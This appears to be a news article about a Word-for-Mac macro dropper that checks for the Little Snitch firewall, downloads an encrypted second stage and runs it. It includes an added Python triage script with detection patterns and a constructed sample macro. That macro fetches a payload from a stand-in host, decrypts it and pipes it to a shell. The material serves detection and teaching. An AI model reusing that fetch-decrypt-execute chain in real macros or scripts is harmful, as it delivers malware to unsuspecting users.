A new Mac malware attack has been discovered that borrows a decades-old technique from the Windows world: macros that run automatically when a Microsoft Word document is opened. As first reported by Objective-See, the technique is crude, but once an unsuspecting user opens the booby-trapped document and chooses to enable macros, the malicious code runs silently on the target Mac and immediately attempts to download a second-stage payload.
The attack was first discovered in a Word file titled “U.S. Allies and Rivals Digest Trump’s Victory – Carnegie Endowment for International Peace.”
Once the user opens the infected document in Word for Mac and clicks Enable Macros in the security dialog, the embedded macro does the following:
- Checks that Little Snitch, a popular macOS outbound firewall, is not running (if it were, the malware's network activity would prompt the user).
- Downloads an encrypted second-stage payload from a remote server.
- Decrypts the payload with a key hard-coded in the macro.
- Executes the decrypted payload.
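As an added example (not code from Objective-See, Microsoft or this article), here is a small Python triage script for the chain above: it first checks whether a Word file carries a VBA project at all, then scans macro source text for the four listed behaviours, undoing the line-continuation, Chr() and string-concatenation tricks that macros use to hide strings such as the firewall's name. The sample document, the sample macro, the example.invalid server name and the key are all constructed for this example.

```python
"""Triage helpers for the macro-dropper pattern described above.

Added example, not the malware's code or anyone's product: (1) does an OOXML
Word file contain a VBA project, and (2) does macro source show the chain of
security-tool check, download, decrypt-with-hard-coded-key and execute.
"""
import io
import re
import zipfile

VBA_PROJECT = "word/vbaProject.bin"   # present only in macro-enabled documents

# Indicator families mapped to the stages the article lists. Patterns are
# illustrative; production triage should unpack vbaProject.bin (for example
# with oletools) rather than rely on already-extracted source text.
INDICATORS = {
    "auto_execute":        [r"\bAutoOpen\b", r"\bDocument_Open\b", r"\bAutoExec\b"],
    "security_tool_check": [r"Little\s?Snitch", r"\bps\s+(-ef|aux)\b", r"\bpgrep\b"],
    "download":            [r"\bcurl\b", r"\bwget\b", r"https?://", r"\burllib2?\b",
                            r"URLDownloadToFile|XMLHTTP"],
    "decrypt_with_key":    [r"\b(rc4|aes|xor)\b",
                            r"-k\s+\S{8,}|\bkey\s*=\s*['\"][^'\"]{8,}['\"]"],
    "execute":             [r"\b(Shell|MacScript)\b", r"\bpython\b", r"/bin/(ba)?sh\b"],
}
STAGES = {"security_tool_check", "download", "decrypt_with_key", "execute"}


def has_vba_project(doc_bytes):
    """True if the OOXML document contains a VBA project (a .docm, or a renamed one)."""
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        return VBA_PROJECT in zf.namelist()


def normalize_vba(source):
    """Undo the simplest macro obfuscations before pattern matching.

    Joins VBA line continuations (" _" at end of line), turns Chr(n) into the
    literal character (VBA Chr takes 0-255), and folds string concatenations so
    that "Little" & Chr(83) & "nitch" becomes "LittleSnitch".
    """
    text = re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", source)
    text = re.sub(r"\bChr\((\d+)\)",
                  lambda m: '"' + chr(int(m.group(1)) & 0xFF) + '"', text)
    text = re.sub(r'"\s*[&+]\s*"', "", text)
    return text


def scan_macro_source(source):
    """Return {indicator family: [patterns that matched]} for the macro text."""
    text = normalize_vba(source)
    hits = {}
    for family, patterns in INDICATORS.items():
        matched = [p for p in patterns if re.search(p, text, re.IGNORECASE)]
        if matched:
            hits[family] = matched
    return hits


def verdict(hits):
    """An auto-executing macro showing most of the chain is the dropper pattern."""
    if "auto_execute" in hits and len(STAGES & set(hits)) >= 3:
        return "likely macro dropper"
    return "suspicious" if hits else "no indicators"


def build_sample_doc(with_macros):
    """Constructed minimal OOXML-style zip for the example; not a real Word file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            zf.writestr(VBA_PROJECT, b"\xd0\xcf\x11\xe0 placeholder OLE stream")
    return buf.getvalue()


# Constructed macro modelled on the chain above; the server name and key are fake.
SAMPLE_MACRO = '''Sub AutoOpen()
    Dim cmd As String
    ' bail out if the outbound firewall is running, otherwise fetch stage two
    cmd = "ps -ef | grep -v grep | grep " & "Little" & Chr(83) & "nitch" & _
          " > /dev/null && exit; " & _
          "curl -s http://example.invalid/stage2 -o /tmp/s2 && " & _
          "openssl enc -d -rc4 -k " & "constructed-hardcoded-key" & " -in /tmp/s2 | /bin/sh"
    Shell cmd
End Sub
'''

# Constructed benign macro: a formatting helper with no dropper behaviour.
BENIGN_MACRO = '''Sub TidyTable()
    ' Fit the selected table to its contents
    Selection.Tables(1).AutoFitBehavior wdAutoFitContent
End Sub
'''

if __name__ == "__main__":
    for name, doc in (("report.docx", build_sample_doc(False)),
                      ("report.docm", build_sample_doc(True))):
        print(name, "contains VBA project:", has_vba_project(doc))
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        hits = scan_macro_source(src)
        print(name, "->", verdict(hits), sorted(hits))
```

The normalization step matters more than the pattern list: without it, a macro that spells the firewall's name as `"Little" & Chr(83) & "nitch"` sails past a plain string match, which is exactly why a crude dropper can still slip through naive signature checks.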
Once installed, the payload could log keystrokes, monitor the webcam and the system clipboard, take screenshots, read iMessage conversations, retrieve browsing history and more. It also persists so that it runs again after a reboot.
Thankfully, the second-stage payload has since been removed from the remote server.
Although dangerous, this isn't a particularly advanced attack: it relies entirely on the user clicking Enable Macros.
You can protect yourself from these kinds of attacks by clicking Disable Macros when a Word document from an untrusted source asks to run them; macros are disabled by default, and no document needs them merely to display its content. Given the prevalence of macro-based malware on Windows, it is small wonder that Microsoft's Word dialog includes a clear warning about viruses.